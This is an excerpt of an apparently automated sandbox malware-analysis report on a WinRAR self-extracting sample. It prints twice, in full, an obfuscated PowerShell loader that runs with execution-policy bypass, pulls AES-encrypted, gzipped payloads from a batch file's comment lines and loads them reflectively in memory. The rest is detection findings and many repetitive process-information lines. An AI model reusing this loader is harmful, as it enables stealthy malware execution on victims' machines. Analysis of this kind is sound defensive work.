Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

File is packed with WinRar

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6893593

Jump to behavior

PE file contains sections with non-standard names

Source: jcgLYlM4dg.exe

Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A407F0 push ecx; ret	0_2_00A40803
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A3FEFC push eax; ret	0_2_00A3FF1A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07493826 push dword ptr [eax+eax*2-75h]; iretd	5_2_0749382C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_04DC0DA8 push esi; retf	11_2_04DC0DB2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_04DC11A3 push esp; retf	11_2_04DC11B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_07B53570 push eax; retf	11_2_07B53589

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
